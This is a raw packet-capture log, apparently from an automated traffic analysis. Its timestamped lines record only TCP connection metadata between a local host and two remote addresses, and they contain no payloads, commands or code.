                                                                                                                                                                                              Nov 24, 2024 13:39:29.274218082 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274241924 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274252892 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274256945 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274274111 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274290085 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274291992 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274297953 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274307966 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274326086 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274341106 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274344921 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274359941 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274364948 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274368048 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274369001 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274377108 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274390936 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274410963 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274415016 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274420023 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274430990 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274430990 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274447918 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274465084 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274470091 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274478912 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274481058 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274498940 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274538994 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274554014 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274561882 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274569035 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274578094 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274581909 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274586916 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274609089 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274610996 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274627924 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274642944 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274647951 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274658918 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274662018 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274676085 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274676085 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274687052 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274689913 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274696112 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274698019 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274715900 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274728060 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274732113 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274748087 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274755955 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274765968 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274780989 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274794102 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274797916 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274813890 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274815083 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274831057 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274846077 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274863005 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274866104 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274878025 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274878025 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274895906 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274912119 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274921894 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274930000 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274947882 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274952888 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274970055 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274986029 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.274987936 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.275002003 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.275018930 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.275024891 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.275036097 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.275053024 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.275054932 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.275161982 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.275178909 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.275193930 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.275214911 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.276104927 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.276226997 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.276273012 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.277008057 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.277116060 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.277168989 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.277951956 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.278048992 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.278100014 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.278698921 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.278801918 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.278858900 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.279177904 CET49762443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:29.279222965 CET4434976213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.279290915 CET49762443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:29.279488087 CET49762443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:29.279501915 CET4434976213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.279658079 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.279809952 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.279855967 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.280692101 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.280750990 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.280823946 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.281585932 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.281723022 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.281769037 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.282552004 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.282634974 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.282761097 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.286382914 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.406017065 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.406131029 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.406179905 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.406241894 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.406336069 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.406482935 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.407118082 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.407236099 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.407273054 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.408003092 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.408178091 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.408216000 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.444916964 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.444962978 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.445090055 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.445096016 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.445312977 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.445426941 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.446037054 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.446260929 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.446306944 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.446872950 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.447037935 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.447082043 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.447717905 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.447879076 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.447993994 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.448672056 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.448764086 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.448873997 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.449599028 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.449755907 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.449856043 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.450373888 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.450484991 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.450534105 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.451239109 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.451354027 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.451392889 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.452120066 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.452229977 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.452271938 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.453078032 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.453255892 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.453830004 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.453840971 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.453950882 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.454546928 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.454735994 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.454837084 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.454875946 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.455601931 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.455713987 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.455760002 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.456478119 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.456588984 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.456629038 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.457382917 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.457571030 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.457829952 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.458244085 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.458386898 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.458448887 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.459130049 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.459239960 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.459300995 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.460001945 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.460146904 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.460190058 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.460928917 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.460990906 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.461092949 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.461807966 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.461945057 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.461996078 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.462651968 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.462766886 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.462814093 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.463505983 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.463614941 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.463669062 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.464396954 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.464531898 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.464647055 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.465313911 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.465424061 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.465481043 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.466195107 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.466219902 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.466260910 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.467046022 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.467161894 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.467201948 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.467925072 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.468035936 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.468789101 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.468852043 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.468897104 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.469712019 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.469750881 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.469846010 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.470063925 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.470711946 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.470793962 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.471018076 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.471555948 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.471738100 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.471776962 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.472564936 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.472656965 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.472709894 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.473186970 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.473282099 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.473321915 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.474092960 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.474201918 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.474945068 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.474955082 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.475084066 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.475132942 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.476048946 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.476098061 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.476142883 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.476764917 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.476846933 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.476937056 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.477572918 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.477634907 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.477709055 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.478482008 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.478666067 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.478727102 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.479335070 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.479461908 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.479505062 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.480205059 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.480338097 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.480372906 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.481106043 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.481224060 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.481265068 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.481966019 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.482095957 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.482136011 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.482840061 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.482952118 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.482990980 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.483730078 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.483838081 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.483875036 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.484612942 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.484731913 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.485502005 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.485542059 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.485593081 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.485702991 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.486370087 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.486500025 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.486536980 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.487238884 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.487370968 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.487421989 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.488095045 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.542540073 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.616723061 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.616837025 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.616883039 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.617077112 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.617198944 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.617297888 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:29.617990017 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.618237972 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:29.618274927 CET4975280192.168.2.6185.215.113.16
